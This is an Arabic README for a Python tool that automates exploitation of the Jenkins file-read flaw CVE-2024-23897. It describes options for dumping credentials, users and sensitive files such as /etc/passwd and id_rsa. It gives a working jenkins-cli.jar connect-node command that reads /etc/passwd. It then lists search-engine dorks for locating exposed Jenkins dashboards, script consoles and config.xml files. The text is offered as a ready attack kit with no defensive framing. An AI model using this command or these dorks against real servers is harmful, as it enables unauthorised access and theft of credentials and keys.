
سكربت مكتوب بلغة python لأتمتة الثغرة الأمنية CVE-2024-23897
الإصدارات المتأثرة:
سكربت مكتوب بلغة بايثون لأتمتة استغلال الثغرة CVE-2024-23897 🤖 🛠️
يقدّم هذا الكود بلغة بايثون ماسحًا (سكانر) لثغرة محددة (CVE-2024-23897) في خوادم Jenkins. يبدأ بطلب عنوان URL لخادم Jenkins من المستخدم.
ثم يوفّر خيار تنزيل الملف "jenkins-cli.jar" اللازم للتفاعل مع Jenkins من سطر الأوامر. بعد ذلك، يعرض قائمة خيارات تتضمن تنفيذ أوامر مثل الحصول على معلومات عن الخادم، والبيئة، وإعدادات Jenkins، والمستخدمين، والاعتمادات (credentials)، بالإضافة إلى قراءة ملفات حساسة مثل "/etc/passwd" و"/etc/os-release" و"id_rsa".
بمجرد تحديد خيار من القائمة، يتم تنفيذ الأمر المقابل على خادم Jenkins المُقدَّم. الكود منظم بواسطة دوال لتنزيل الملف وتنفيذ الأوامر، ودالة رئيسية للتحكم في تدفق البرنامج.
التنفيذ لخادم Jenkins 📝:
python3 CVE-2024-23897-A-scaner.py
التنفيذ لخادم Jenkins داخل DOCKER 📝:
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
التنفيذ اليدوي.
1- تنزيل jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar
2- لإجراء LFI، نفّذ: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
قائمة الدورك:
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"